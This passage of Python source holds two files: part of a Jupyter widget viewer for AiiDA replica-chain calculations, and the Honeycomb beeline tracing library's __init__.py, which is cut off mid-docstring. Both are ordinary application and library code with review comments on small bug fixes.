            d2prev = struct_rep_info['dist_previous']
            colvar_actual = float(struct_rep_info['colvar_actual'])
            thumbnail = struct_rep_info['thumbnail']

            cv_target_str = "-" if cv_target is None else "%.2f" % cv_target
            energy_scf_str = "%.6f" % energy[0]
            energy_frc_str = "%.6f" % energy[1]
            colvar_actual_str = "%.4f" % colvar_actual
            # '-' marks the first replica, which has no predecessor.
            d2prev_str = "-" if d2prev == '-' else "%.4f" % float(d2prev)

            check_me = ipw.Checkbox(
                value=True,
                description='select',
                disabled=False,
                layout=layout
            )
            # Bind the current values as lambda defaults so every checkbox
            # refers to this replica set and the full checkbox list.
            check_me.observe(lambda x, rc=replica_calc, cl=check_list: self.print_checked_pk_list(rc, cl), 'value')
            check_list.append(check_me)

            html = '<img width="400px" src="data:image/png;base64,{}" title="">'.format(thumbnail)
            html += '<table style="border-spacing:6px 0px;border-collapse:separate;">'
            # Output some information about the replica...
            html += '<tr><td align="left"><b>Target:</b></td><td align="right">{}</td></tr>'\
                .format(cv_target_str)
            html += '<tr><td align="left"><b>CV actual:</b></td><td align="right">{}</td></tr>'\
                .format(colvar_actual_str)
            html += '<tr><td align="left"><b>Energy (scf) /au:</b></td><td align="right">{}</td></tr>'\
                .format(energy_scf_str)
            html += '<tr><td align="left"><b>Energy (force) /au:</b></td><td align="right">{}</td></tr>'\
                .format(energy_frc_str)
            html += '<tr><td align="left"><b>dist to prev:</b></td><td align="right">{}</td></tr>'\
                .format(d2prev_str)
            html += '<tr><td align="left">pk: </td><td align="right">{}</td></tr>'\
                .format(struct_node.pk)
            # ... and the download link.
            html += '<tr><td align="left"><a target="_blank" href="../export_structure.ipynb?uuid={}">View & export</a></td></tr>'\
                .format(struct_node.uuid)
            html += '</table>'

            html_list.append(html)

        return html_list, check_list

    def get_replica_wcs(self, preprocessed=False):
        """Query ReplicaWorkChains, oldest first.

        With preprocessed=True, return only work chains already processed
        with the current preprocess_version; otherwise return the ones that
        still need (re)processing.
        """
        qb = QueryBuilder()
        if preprocessed:
            qb.append(WorkChainNode, tag='wc', filters={
                'attributes.process_label': 'ReplicaWorkChain',
                'and': [
                    {'extras': {'has_key': 'preproc_v'}},
                    {'extras.preproc_v': {'==': self.preprocess_version}},
                ]
            })
        else:
            qb.append(WorkChainNode, tag='wc', filters={
                'attributes.process_label': 'ReplicaWorkChain',
                'or': [
                    {'extras': {'!has_key': 'preproc_v'}},
                    {'extras.preproc_v': {'<': self.preprocess_version}},
                ]
            })
        qb.order_by({'wc': {'ctime': 'asc'}})
        return qb.all()

    def parse_rep_wcs(self, wc_list, existing_rep_sets=None):
        """Group finished ReplicaWorkChains into replica sets, keyed by the
        work chain description.

        Work chains sharing a description are merged into one set (e.g. a
        continuation run), provided their CV definition and direction match.
        Already-parsed sets can be passed in via existing_rep_sets.
        """
        # Bug fix: avoid a mutable default argument (the previous
        # `existing_rep_sets=OrderedDict()` was shared across calls).
        if existing_rep_sets is None:
            existing_rep_sets = OrderedDict()

        replica_sets = OrderedDict()

        rep_set_template = {
            'replicas'   : [],    # (cv_target, (energy_scf, e_force_eval), StructureData.pk)
            'wcs'        : [],
            'colvar_def' : None,
            'colvar_inc' : None,  # colvar increasing or decreasing ?
        }

        for wc_qb in wc_list:
            wc = wc_qb[0]
            # we also want to potentially recover replicas from an excepted calculation
            #if wc.is_excepted:
            #    continue
            if not wc.is_terminated:
                print(str(wc.pk) + " is still running, skipping.")
                continue
            wc_out_names = list(wc.outputs)
            if 'replica_0' not in wc_out_names and 'replica_00' not in wc_out_names:
                continue
            if 'params_0' not in wc_out_names and 'params_00' not in wc_out_names:
                continue

            name = wc.description
            cv_def = dict(wc.inputs['subsys_colvar'])
            cv_targets = [float(cvt) for cvt in wc.inputs['colvar_targets'].value.split()]
            # NB: there is no colvar target for replica_0 as that is the initial geometry
            cv_targets = [None] + cv_targets
            # NOTE(review): assumes at least two CV targets were given —
            # confirm against the work chain input validation.
            cv_inc = cv_targets[2] > cv_targets[1]

            energies = [(wc.outputs[o]['energy_scf'], wc.outputs[o]['energy_force'])
                        for o in sorted(wc.outputs) if o.startswith('params_')]

            num_replicas = len([n for n in wc_out_names if n.startswith('replica')])
            if num_replicas != len(cv_targets):
                # The work chain stopped early: drop targets never reached.
                cv_targets = cv_targets[:num_replicas]

            if name not in replica_sets:
                if name in existing_rep_sets:
                    # Already had a preprocessed part, add it
                    replica_sets[name] = copy.copy(existing_rep_sets[name])
                else:
                    # New replica set
                    replica_sets[name] = copy.deepcopy(rep_set_template)
                    replica_sets[name]['colvar_def'] = cv_def
                    replica_sets[name]['colvar_inc'] = cv_inc

            # Does the current wc match with the replica set?
            if replica_sets[name]['colvar_def'] != cv_def or replica_sets[name]['colvar_inc'] != cv_inc:
                print("----")
                print("Warning! Replica calc CV definition doesn't match with previous ones.")
                print("Existing: %s %s" % (str([w.pk for w in replica_sets[name]['wcs']]),
                                           "cv_def: %s, cv_inc: %s" % (str(replica_sets[name]['colvar_def']),
                                                                       str(replica_sets[name]['colvar_inc']))))
                print("Skipping: %s %s " % (str(wc.pk), "cv_def: %s, cv_inc: %s" % (str(cv_def),
                                                                                    str(cv_inc))))
                print("----")
                continue

            # add it to the set
            replica_sets[name]['wcs'].append(wc)

            wc_replica_list = []
            for wc_o in sorted(list(wc.outputs)):
                if wc_o.startswith("replica_"):
                    struct = wc.outputs[wc_o]
                    # add description, if it doesn't exist already
                    if struct.description == "":
                        if struct.creator is None:
                            struct.description = "-"
                        else:
                            struct.description = struct.creator.description
                    wc_replica_list.append(wc.outputs[wc_o])

            # Add the replicas of this wc to the set if it doesn't exist there already
            # (e.g. in case of continuation from another wc)
            for i_rep in range(len(wc_replica_list)):
                if wc_replica_list[i_rep].pk not in [s[2] for s in replica_sets[name]['replicas']]:
                    replica = (cv_targets[i_rep], energies[i_rep], wc_replica_list[i_rep].pk)
                    replica_sets[name]['replicas'].append(replica)

            # Sort entries by cv target (e.g. one could be adding replicas in-between prev calculated ones)
            #if cv_inc:
            #    replica_sets[name]['replicas'].sort(key=lambda x:(x[0] is not None, x[0], x[2]))
            #else:
            #    replica_sets[name]['replicas'].sort(reverse=True, key=lambda x:(x[0] is None, x[0], x[2]))

        return replica_sets

    def get_replica_distance(self, s1, s2):
        """Frobenius norm of the position difference between two ASE structures."""
        a1 = s1.get_positions()
        a2 = s2.get_positions()
        return np.linalg.norm(a1-a2)

    def render_thumbnail(self, atoms, vis_list=None):
        """Render an ASE structure to a base64-encoded PNG.

        Integer entries of vis_list are highlighted (reddened) atoms.
        """
        colors = None
        if vis_list:
            vis_list_atoms = [e for e in vis_list if isinstance(e, int)]
            colors = jmol_colors[atoms.numbers]
            for i_at in vis_list_atoms:
                colors[i_at] *= 0.6
                colors[i_at][0] = 1.0
        tmp = NamedTemporaryFile()
        ase.io.write(tmp.name, atoms, format='png', colors=colors)  # does not accept StringIO
        # Bug fix: close the file handle instead of leaking it.
        with open(tmp.name, 'rb') as raw_png:
            raw = raw_png.read()
        tmp.close()
        return b64encode(raw).decode()

    def order_replicas_by_cv_actual(self, replica_calc):
        """Sort replica_calc['replicas'] in place by the preprocessed actual
        CV value, following the set's CV direction."""
        wc_pk_str = str(replica_calc['wcs'][0].pk)
        cv_actual_list = []
        for i, rep in enumerate(replica_calc['replicas']):
            cv_target, energy, struct_pk = rep
            struct_node = load_node(struct_pk)
            struct_rep_info = struct_node.get_extra('replica_calcs')[wc_pk_str]
            colvar_actual = float(struct_rep_info['colvar_actual'])
            cv_actual_list.append(colvar_actual)
        sorted_lists = list(zip(*sorted(zip(cv_actual_list, replica_calc['replicas']),
                                        reverse=not replica_calc['colvar_inc'])))
        cv_actual_list = list(sorted_lists[0])
        replica_calc['replicas'] = list(sorted_lists[1])

    def preprocess(self, replica_calc, overwrite_thumbnails=False):
        """Evaluate the actual CV, distance-to-previous and thumbnail for
        every replica of a set and cache them as structure extras."""
        # Find all PKs of all work-calcs that contributed to this set
        print("wc pk: " + str([wc.pk for wc in replica_calc['wcs']]))

        progress = ipw.FloatProgress(description='Parsing images...', min=0, max=1, value=0.,
                                     style=style, layout=layout)
        display(progress)

        wc_preproc_failed = False

        n_rep = len(replica_calc['replicas'])

        # Set up the collective variable instance for evaluation
        colvar_type = list(replica_calc['colvar_def'].keys())[0]
        cv_instance = COLVARS[colvar_type].from_cp2k_subsys(replica_calc['colvar_def'])

        # -----------------------------------------------------------
        # Get the list of ase and actual colvar values for each replica
        ase_list = []
        cv_actual_list = []
        for i, rep in enumerate(replica_calc['replicas']):
            cv_target, energy, struct_pk = rep
            struct = load_node(struct_pk)
            progress.value += (i+1.)/(2*n_rep)
            struct_ase = struct.get_ase()
            colvar_actual = cv_instance.eval_cv(struct_ase)
            ase_list.append(struct_ase)
            cv_actual_list.append(colvar_actual)

        # -----------------------------------------------------------
        # Sort the order of replicas by colvar actual
        sorted_lists = zip(*sorted(zip(cv_actual_list, ase_list, replica_calc['replicas']),
                                   reverse=not replica_calc['colvar_inc']))
        cv_actual_list, ase_list, replica_calc['replicas'] = sorted_lists

        # -----------------------------------------------------------
        # calculate the dist to prev and update extras
        for i, rep in enumerate(replica_calc['replicas']):
            cv_target, energy, struct_pk = rep
            struct = load_node(struct_pk)
            cv_actual = cv_actual_list[i]
            struct_ase = ase_list[i]
            progress.value += (i+1.)/(2*n_rep)

            if i == 0:
                dist_previous = '-'
            else:
                dist_previous = self.get_replica_distance(ase_list[i-1], struct_ase)

            # Update the extras of the current structure
            wc_pk_str = str(replica_calc['wcs'][0].pk)
            if 'replica_calcs' not in list(struct.extras):
                struct.set_extra('replica_calcs', {})

            rep_calcs = struct.extras['replica_calcs']
            if wc_pk_str not in rep_calcs:
                rep_calcs[wc_pk_str] = {}

            rep_calcs[wc_pk_str]['preproc_v'] = self.preprocess_version
            rep_calcs[wc_pk_str]['dist_previous'] = dist_previous
            rep_calcs[wc_pk_str]['colvar_actual'] = cv_actual

            if 'thumbnail' not in rep_calcs[wc_pk_str] or overwrite_thumbnails:
                t = struct_ase
                vis_list = cv_instance.visualization_list(t)
                thumbnail = self.render_thumbnail(t, vis_list)
                rep_calcs[wc_pk_str]['thumbnail'] = thumbnail

            struct.set_extra('replica_calcs', rep_calcs)

        # -----------------------------------------------------------
        # Mark every contributing work chain as preprocessed.
        for wc in replica_calc['wcs']:
            wc.set_extra('preproc_v', self.preprocess_version)
            wc.set_extra('preproc_failed', wc_preproc_failed)

    def preprocess_replicas(self):
        """Find not-yet-preprocessed replica sets, preprocess them and
        refresh the dropdown."""
        with self.out_preproc:
            print('Retrieving unparsed replica calculations...')
            reps_not_preproc = self.parse_rep_wcs(self.get_replica_wcs(False), existing_rep_sets=self.replica_calcs)
            print('Preprocessing {} replicas...'.format(len(reps_not_preproc.keys())))
        for i, k in enumerate(reps_not_preproc.keys()):
            with self.out_preproc:
                print('{}: {}/{}'.format(k, i+1, len(reps_not_preproc.keys())))
                self.preprocess(reps_not_preproc[k])
        with self.out_preproc:
            print('Done!')
        self.parse_preprocessed_replica_calcs()
# ---------------------------------------------------------------------------
# beeline/__init__.py
''' module beeline '''
import functools
import logging
import os
import socket
from contextlib import contextmanager
from libhoney import Client
from beeline.trace import SynchronousTracer
from beeline.version import VERSION
from beeline import internal
import beeline.propagation.default
import sys
# pyflakes: reference the imported `internal` module so it is not flagged unused.
assert internal

# Appended to the libhoney client's user agent (see Client(user_agent_addition=...)).
USER_AGENT_ADDITION = "beeline-python/%s" % VERSION

# This is the global beeline created by init
_GBL = None
# This is the PID that initialized the beeline.
_INITPID = None
# Detect asyncio support: probe for asyncio.get_running_loop. On interpreters
# where asyncio or get_running_loop is missing, the probe (or the aiotrace
# import) raises ImportError/AttributeError and we fall back to sync-only mode.
try:
    import asyncio

    try:
        asyncio.get_running_loop()  # pylint: disable=no-member
    except RuntimeError:
        # No loop is currently running — that's fine, the API exists.
        pass

    from beeline.aiotrace import AsyncioTracer, traced_impl, untraced
    assert untraced  # pyflakes: re-exported name, keep the import

    def in_async_code():
        """Return whether we are running inside an asynchronous task.

        We use this information to determine which tracer
        implementation to use.
        """
        try:
            asyncio.get_running_loop()  # pylint: disable=no-member
            return True
        except RuntimeError:
            return False

except (ImportError, AttributeError):
    # Use these non-async versions if we don't have asyncio.
    from beeline.trace import traced_impl

    def in_async_code():
        # No asyncio available: we can never be in an async task.
        return False
class Beeline(object):
    """Bundles a libhoney client, a tracer implementation and the
    configured sampling/presend/propagation hooks."""

    def __init__(self,
                 writekey='', dataset='', service_name='',
                 tracer=None, sample_rate=1, api_host='https://api.honeycomb.io',
                 max_concurrent_batches=10, max_batch_size=100, send_frequency=0.25,
                 block_on_send=False, block_on_response=False,
                 transmission_impl=None, sampler_hook=None, presend_hook=None,
                 http_trace_parser_hook=beeline.propagation.default.http_trace_parser_hook,
                 http_trace_propagation_hook=beeline.propagation.default.http_trace_propagation_hook,
                 debug=False):
        self.client = None
        self.tracer_impl = None
        self.presend_hook = None
        self.sampler_hook = None
        self.http_trace_parser_hook = None
        self.http_trace_propagation_hook = None
        self.debug = debug
        if debug:
            self._init_logger()

        # allow setting some values from the environment
        if not writekey:
            writekey = os.environ.get('HONEYCOMB_WRITEKEY', '')

        if not dataset:
            dataset = os.environ.get('HONEYCOMB_DATASET', '')

        if not service_name:
            service_name = os.environ.get('HONEYCOMB_SERVICE', dataset)

        self.client = Client(
            writekey=writekey, dataset=dataset, sample_rate=sample_rate,
            api_host=api_host, max_concurrent_batches=max_concurrent_batches,
            max_batch_size=max_batch_size, send_frequency=send_frequency,
            block_on_send=block_on_send, block_on_response=block_on_response,
            transmission_impl=transmission_impl,
            user_agent_addition=USER_AGENT_ADDITION,
            debug=debug,
        )

        # NOTE(review): this logs the write key when debug is on — confirm
        # that is acceptable before enabling debug outside development.
        self.log('initialized honeycomb client: writekey=%s dataset=%s service_name=%s',
                 writekey, dataset, service_name)
        if not writekey:
            self.log(
                'writekey not set! set the writekey if you want to send data to honeycomb')
        if not dataset:
            self.log(
                'dataset not set! set a value for dataset if you want to send data to honeycomb')

        self.client.add_field('service_name', service_name)
        self.client.add_field('meta.beeline_version', VERSION)
        self.client.add_field('meta.local_hostname', socket.gethostname())

        # Pick the tracer implementation matching the current execution
        # context (inside an async task vs. synchronous code).
        if in_async_code():
            self.tracer_impl = AsyncioTracer(self.client)
        else:
            self.tracer_impl = SynchronousTracer(self.client)
        self.tracer_impl.register_hooks(
            presend=presend_hook,
            sampler=sampler_hook,
            http_trace_parser=http_trace_parser_hook,
            http_trace_propagation=http_trace_propagation_hook)
        self.sampler_hook = sampler_hook
        self.presend_hook = presend_hook
        self.http_trace_parser_hook = http_trace_parser_hook
        self.http_trace_propagation_hook = http_trace_propagation_hook

    def send_now(self, data):
        ''' DEPRECATED - to be removed in a future release

        Create an event and enqueue it immediately. Does not work with
        `beeline.add_field` - this is equivalent to calling `libhoney.send_now`
        '''
        ev = self.client.new_event()

        if data:
            ev.add(data)
        self._run_hooks_and_send(ev)

    def add_field(self, name, value):
        ''' Add a field to the currently active span.

        `beeline.add_field("my field", "my value")`

        If a field is being attributed to the wrong span/event,
        make sure that `new_event` and `close_event` calls are matched.
        '''
        # fetch the current event from our tracer
        span = self.tracer_impl.get_active_span()
        # if there are no spans, this is a noop
        if span is None:
            return
        span.add_context_field(name, value)

    def add(self, data):
        '''Similar to add_field(), but allows you to add a number of name:value pairs
        to the currently active event at the same time.

        `beeline.add({ "first_field": "a", "second_field": "b"})`
        '''
        # fetch the current event from the tracer
        span = self.tracer_impl.get_active_span()
        # if there are no spans, this is a noop
        if span is None:
            return
        span.add_context(data)

    def tracer(self, name, trace_id=None, parent_id=None):
        '''Start a trace/span named *name* via the underlying tracer
        implementation (delegates to `self.tracer_impl`).'''
        return self.tracer_impl(name=name, trace_id=trace_id, parent_id=parent_id)

    def new_event(self, data=None, trace_name=''):
        ''' DEPRECATED: Helper method that wraps `start_trace` and
        `start_span`. It is better to use these methods as it provides
        better control and context around how traces are implemented in your
        app.

        Creates a new span, populating it with the given data if
        supplied. If no trace is running, a new trace will be started,
        otherwise the event will be added as a span of the existing trace.

        To send the event, call `beeline.send_event()`. There should be a
        `send_event()` for each call to `new_event()`, or tracing and
        `add` and `add_field` will not work correctly.

        If trace_name is specified, will set the "name" field of the current span,
        which is used in the trace visualizer.
        '''
        if trace_name:
            # Bug fix: `data` defaults to None; assigning into it previously
            # raised TypeError whenever a trace_name was given without data.
            if data is None:
                data = {}
            data['name'] = trace_name
        if self.tracer_impl.get_active_trace_id():
            self.tracer_impl.start_span(context=data)
        else:
            self.tracer_impl.start_trace(context=data)

    def send_event(self):
        ''' DEPRECATED: Sends the currently active event (current span),
        if it exists.

        There must be one call to `send_event` for each call to `new_event`.
        '''
        span = self.tracer_impl.get_active_span()
        if span:
            if span.is_root():
                self.tracer_impl.finish_trace(span)
                return
            self.tracer_impl.finish_span(span)

    def send_all(self):
        ''' send all spans in the trace stack, regardless of their
        state
        '''
        span = self.tracer_impl.get_active_span()
        while span:
            if span.is_root():
                # Finishing the root also ends the trace; nothing is left.
                self.tracer_impl.finish_trace(span)
                return
            self.tracer_impl.finish_span(span)
            span = self.tracer_impl.get_active_span()

    def traced(self, name, trace_id=None, parent_id=None):
        '''Return the `traced_impl` wrapper bound to this beeline's tracer
        (used to trace a function call named *name*).'''
        return traced_impl(tracer_fn=self.tracer, name=name, trace_id=trace_id, parent_id=parent_id)

    def traced_thread(self, fn):
        '''Wrap *fn* so it runs with a copy of the current trace state,
        allowing the trace to continue across a thread boundary.'''
        trace_copy = self.tracer_impl._trace.copy()

        @functools.wraps(fn)
        def wrapped(*args, **kwargs):
            self.tracer_impl._trace = trace_copy
            return fn(*args, **kwargs)

        return wrapped

    def _run_hooks_and_send(self, ev):
        ''' internal - run any defined hooks on the event and send '''
        presampled = False
        if self.sampler_hook:
            self.log("executing sampler hook on event ev = %s", ev.fields())
            keep, new_rate = self.sampler_hook(ev.fields())
            if not keep:
                self.log(
                    "skipping event due to sampler hook sampling ev = %s", ev.fields())
                return
            ev.sample_rate = new_rate
            presampled = True

        if self.presend_hook:
            self.log("executing presend hook on event ev = %s", ev.fields())
            self.presend_hook(ev.fields())

        if presampled:
            self.log("enqueuing presampled event ev = %s", ev.fields())
            ev.send_presampled()
        else:
            self.log("enqueuing event ev = %s", ev.fields())
            ev.send()

    def _init_logger(self):
        '''internal - set up the debug logger (stream handler at DEBUG).'''
        self._logger = logging.getLogger('honeycomb-beeline')
        self._logger.setLevel(logging.DEBUG)
        # Bug fix: `getLogger` returns a process-wide singleton, so adding a
        # handler unconditionally stacked duplicates (doubled log lines) when
        # a beeline was re-initialized, e.g. after a fork.
        if not self._logger.handlers:
            ch = logging.StreamHandler()
            ch.setLevel(logging.DEBUG)
            formatter = logging.Formatter(
                '%(asctime)s - %(name)s - %(levelname)s - %(message)s')
            ch.setFormatter(formatter)
            self._logger.addHandler(ch)

    def log(self, msg, *args, **kwargs):
        '''internal - debug-log *msg*; no-op unless debug mode is on.'''
        if self.debug:
            self._logger.debug(msg, *args, **kwargs)

    def get_responses_queue(self):
        '''Return the libhoney client's queue of send responses.'''
        return self.client.responses()

    def close(self):
        '''Shut down the underlying libhoney client, if one was created.'''
        if self.client:
            self.client.close()
def init(writekey='', dataset='', service_name='', tracer=None,
         sample_rate=1, api_host='https://api.honeycomb.io', transmission_impl=None,
         sampler_hook=None, presend_hook=None, debug=False, *args, **kwargs):
    '''Initialize the global honeycomb beeline: a module-local libhoney
    client plus a tracer that tracks traces and spans.

    Args:
    - `writekey`: the authorization key for your team on Honeycomb. Find your team
        write key at [https://ui.honeycomb.io/account](https://ui.honeycomb.io/account)
    - `dataset`: the name of the default dataset to which to write
    - `sample_rate`: the default sample rate. 1 / `sample_rate` events will be sent.
    - `transmission_impl`: if set, override the default transmission implementation
        (for example, TornadoTransmission)
    - `sampler_hook`: a function called just before each event is sent. It receives
        the event's field dict and returns a `(bool, int)` tuple: whether to send
        the event, and the updated sample rate to use.
    - `presend_hook`: a function called just before each event is sent (after
        `sampler_hook`, when both are set). It receives the event's field dict and
        may add, modify/scrub, or drop fields.

    If in doubt, just set `writekey` and `dataset` and move on!
    '''
    global _GBL
    global _INITPID

    current_pid = os.getpid()
    if _GBL:
        if current_pid == _INITPID:
            # Same process already holds a beeline: nothing to do.
            _GBL.log("beeline already initialized! skipping initialization")
            return
        # The module state survived a fork: close the inherited client and
        # build a fresh one (with a fresh transmission thread) below.
        _GBL.log("beeline already initialized, but process ID has changed (was {}, now {}). Reinitializing.".format(
            _INITPID, current_pid))
        _GBL.close()

    _GBL = Beeline(
        writekey=writekey, dataset=dataset, sample_rate=sample_rate,
        api_host=api_host, transmission_impl=transmission_impl,
        debug=debug, presend_hook=presend_hook, sampler_hook=sampler_hook,
        service_name=service_name,
        # since we've simplified the init function signature a bit,
        # pass on other args for backwards compatibility
        *args, **kwargs
    )
    # Remember which process created the beeline so a later fork can be
    # detected and the client re-created in the child.
    _INITPID = current_pid
def send_now(data):
    ''' Create an event and enqueue it immediately. Does not work with
    `beeline.add_field` - this is equivalent to calling `libhoney.send_now`

    Args:
    - `data`: dictionary of field names (strings) to field values to include
       in the event
    '''
    client = get_beeline()
    if not client:
        # beeline not initialized - silently do nothing
        return
    client.send_now(data)
def add_field(name, value):
    ''' DEPRECATED: use `add_context_field`

    Args:
    - `name`: name of the field to add to the currently active event
    - `value`: value of the new field
    '''
    # Use the get_beeline() accessor for consistency with the other
    # module-level helpers (the original read the _GBL global directly;
    # behavior is identical: no-op when the beeline is not initialized).
    bl = get_beeline()
    if bl:
        bl.add_field(name, value)
def add(data):
    '''DEPRECATED: use `add_context`

    Args:
    - `data`: dictionary of field names (strings) to field values to add
    '''
    client = get_beeline()
    if not client:
        return
    client.add(data)
def add_context(data):
    '''Add several name:value pairs to the currently active event at once.
    Similar to `add_context_field()`, but takes a dictionary:

    `beeline.add_context({ "first_field": "a", "second_field": "b"})`

    Args:
    - `data`: dictionary of field names (strings) to field values to add
    '''
    client = get_beeline()
    if not client:
        return
    client.tracer_impl.add_context(data=data)
def add_context_field(name, value):
    ''' Add a single field to the currently active span. For example, if you
    are using django and wish to add additional context to the current request
    before it is sent to Honeycomb:

    `beeline.add_context_field("my field", "my value")`

    Args:
    - `name`: Name of field to add
    - `value`: Value of new field
    '''
    client = get_beeline()
    if not client:
        return
    client.tracer_impl.add_context_field(name=name, value=value)
def remove_context_field(name):
    ''' Remove a single field from the current span.

    ```
    beeline.add_context({ "first_field": "a", "second_field": "b"})
    beeline.remove_context_field("second_field")
    ```

    Args:
    - `name`: Name of field to remove
    '''
    client = get_beeline()
    if not client:
        return
    client.tracer_impl.remove_context_field(name=name)
def add_rollup_field(name, value):
    ''' Add a numeric field to the current span whose values are summed.

    If called repeatedly on the same span, the values will be summed together.
    Additionally, this field will be summed across all spans and added to the
    trace as a total. It is especially useful for things like accumulating the
    duration spent talking to a specific external service - e.g. database
    time. The root span will then get a field that represents the total time
    spent talking to the database from all of the spans that are part of the
    trace.

    Args:
    - `name`: Name of field to add
    - `value`: Numeric (float) value of new field
    '''
    client = get_beeline()
    if not client:
        return
    client.tracer_impl.add_rollup_field(name=name, value=value)
def add_trace_field(name, value):
    ''' Similar to `add_context_field` - adds a field to the current span, but
    also to all other future spans in this trace. Trace context fields will be
    propagated to downstream services if using instrumented libraries
    like `requests`.

    Args:
    - `name`: Name of field to add
    - `value`: Value of new field
    '''
    client = get_beeline()
    if not client:
        return
    client.tracer_impl.add_trace_field(name=name, value=value)
def remove_trace_field(name):
    ''' Remove a trace context field from the current span. This will not
    affect other existing spans, but will prevent the field from being
    propagated to new spans.

    Args:
    - `name`: Name of field to remove
    '''
    client = get_beeline()
    if not client:
        return
    client.tracer_impl.remove_trace_field(name=name)
def tracer(name, trace_id=None, parent_id=None):
    '''
    When used as a context manager, creates a span for the contained
    code. If a trace is ongoing, adds a new child span under the currently
    running span. If no trace is ongoing, starts a new trace.

    Example use:
    ```
    with tracer(name="my expensive computation"):
        recursive_fib(100)
    ```

    Args:
    - `name`: a descriptive name for this trace span, i.e. "database query for user"
    - `trace_id`: the trace_id to use. If None, will be automatically generated if no
       current trace is ongoing. Use this if you want to explicitly resume a trace
       in this application that was initiated in another application, and you have
       the upstream trace_id.
    - `parent_id`: If trace_id is set, will populate the root span's parent
       with this id.
    '''
    client = get_beeline()
    if client:
        return client.tracer(name=name, trace_id=trace_id, parent_id=parent_id)

    # Beeline not initialized: hand back a do-nothing context manager so
    # `with tracer(...)` still works.
    @contextmanager
    def _do_nothing():
        yield
    return _do_nothing()
def start_trace(context=None, trace_id=None, parent_span_id=None):
    '''
    Start a trace and return its root span. To finish the trace, pass that
    span to `finish_trace`. `start_trace` does not propagate contexts - if you
    wish to propagate contexts from sources such as HTTP headers, use
    `propagate_and_start_trace` instead. If you are using the beeline
    middleware plugins (e.g. for django, flask, or AWS lambda), you will want
    to use `start_span` instead, as `start_trace` is already called at the
    start of the request.

    Args:
    - `context`: optional dictionary of event fields to populate the root span with
    - `trace_id`: the trace_id to use. If None, will be automatically generated.
       Use this if you want to explicitly resume a trace in this application that
       was initiated in another application, and you have the upstream trace_id.
    - `parent_span_id`: If trace_id is set, will populate the root span's parent
       with this id.
    '''
    client = get_beeline()
    if not client:
        # beeline not initialized - no trace is started
        return None
    return client.tracer_impl.start_trace(
        context=context, trace_id=trace_id, parent_span_id=parent_span_id)
def finish_trace(span):
    ''' Explicitly finish a trace. If you started a trace with `start_trace`,
    you must call this to close the trace and send the root span. If you are
    using the beeline middleware plugins, such as django, flask, or AWS
    lambda, you can skip this step as the trace will be closed for you.

    Args:
    - `span`: Span object that was returned by `start_trace`
    '''
    client = get_beeline()
    if not client:
        return
    client.tracer_impl.finish_trace(span=span)
def start_span(context=None, parent_id=None):
    '''
    Start a new span and return the span object. Returns None if no trace is
    active.

    For each `start_span`, there should be exactly one call to `finish_span`.
    Child spans should also be closed before parent spans. Closing spans out
    of order will lead to strange results and can break the bookkeeping needed
    to preserve trace structure. For example:

    ```
    parent_span = beeline.start_span()
    # this span is a child of the last span created
    child_span = beeline.start_span()
    beeline.finish_span(child_span)
    beeline.finish_span(parent_span)
    ```

    Args:
    - `context`: optional dictionary of event fields to populate the span with
    - `parent_id`: ID of parent span - use this only if you have a very good
       reason to do so.
    '''
    bl = get_beeline()
    if bl:
        return bl.tracer_impl.start_span(context=context, parent_id=parent_id)
def finish_span(span):
    '''
    Finish the provided span, sending the associated event data to Honeycomb.

    For each `start_span`, there should be one call to `finish_span`.

    Args:
    - `span`: Span object that was returned by `start_span`
    '''
    bl = get_beeline()
    if bl:
        bl.tracer_impl.finish_span(span=span)
def propagate_and_start_trace(context, request):
    '''
    Given a field context and a beeline.propagation.Request subclass, call the
    registered header-parsing hooks to pick up trace information propagated
    from the incoming http (or similar) request, and start a new trace that
    continues the upstream trace when such information exists.

    Returns the new trace, or None if the beeline is not initialized.
    '''
    client = get_beeline()
    if client:
        return client.tracer_impl.propagate_and_start_trace(context, request)
    return None
def http_trace_parser_hook(headers):
    '''
    Given request headers, call the registered header-parsing hooks to extract
    trace propagation information from the incoming http (or similar) request
    context, returning a new trace built from that information if it exists.
    '''
    client = get_beeline()
    if client:
        return client.tracer_impl.http_trace_parser_hook(headers)
    return None
def http_trace_propagation_hook():
    '''
    Return the outbound headers that encode the currently active trace's
    propagation context, for inclusion in outgoing http (or similar) requests,
    by calling the registered propagation hook.

    Returns None if the beeline is not initialized, or if the propagation
    hook raises an exception (the error is logged).
    '''
    bl = get_beeline()
    if bl:
        try:
            return bl.tracer_impl.http_trace_propagation_hook(
                bl.tracer_impl.get_propagation_context())
        except Exception:
            # Never let a propagation failure break the caller's request path:
            # log the error and fall through to returning None.
            err = sys.exc_info()
            bl.log('error: http_trace_propagation_hook returned exception: %s', err)
    return None
def marshal_trace_context():
    '''
    DEPRECATED: Return a serialized form of the current trace context
    (including the trace id and the current span), encoded as a string. You
    can use this to propagate trace context to other services.

    Use `beeline.propagation.honeycomb` functions to work with honeycomb trace
    context instead.

    Example:
    ```
    trace_context = beeline.marshal_trace_context()
    headers = {'X-Honeycomb-Trace': trace_context}
    requests.get("http://...", headers=headers)
    ```
    '''
    client = get_beeline()
    if client:
        return client.tracer_impl.marshal_trace_context()
    return None
def new_event(data=None, trace_name=''):
    ''' DEPRECATED: Helper method that wraps `start_trace` and `start_span`.
    Prefer those methods, as they provide better control and context around
    how traces are implemented in your app.

    Creates a new span, populating it with the given data if supplied. If no
    trace is running, a new trace will be started, otherwise the event will be
    added as a span of the existing trace.

    To send the event, call `beeline.send_event()`. There should be a
    `send_event()` for each call to `new_event()`, or tracing and `add` and
    `add_field` will not work correctly.

    If `trace_name` is specified, the "name" field of the current span is set;
    this name is used in the trace visualizer.
    '''
    client = get_beeline()
    if not client:
        return
    client.new_event(data=data, trace_name=trace_name)
def send_event():
    ''' DEPRECATED: Sends the currently active event (current span), if it
    exists.

    There must be one call to `send_event` for each call to `new_event`.
    '''
    client = get_beeline()
    if not client:
        return
    client.send_event()
def send_all():
    ''' Send all spans in the trace stack, regardless of their state. You
    might use this in a catch-all error handler along with `beeline.close()`
    to send all events before the program terminates abruptly.
    '''
    client = get_beeline()
    if not client:
        return
    client.send_all()
def get_beeline():
    ''' Return the global Beeline instance, or None if the beeline has not
    been initialized (or has been closed). '''
    return _GBL
def get_responses_queue():
    '''
    Return a queue from which you can read a record of response info from
    each event sent. Responses will be dicts with the following keys:
    - `status_code` - the HTTP response from the api (eg. 200 or 503)
    - `duration` - how long it took to POST this event to the api, in ms
    - `metadata` - pass through the metadata you added on the initial event
    - `body` - the content returned by API (will be empty on success)
    - `error` - in an error condition, this is filled with the error message

    When the Client's `close` method is called, a None will be inserted on
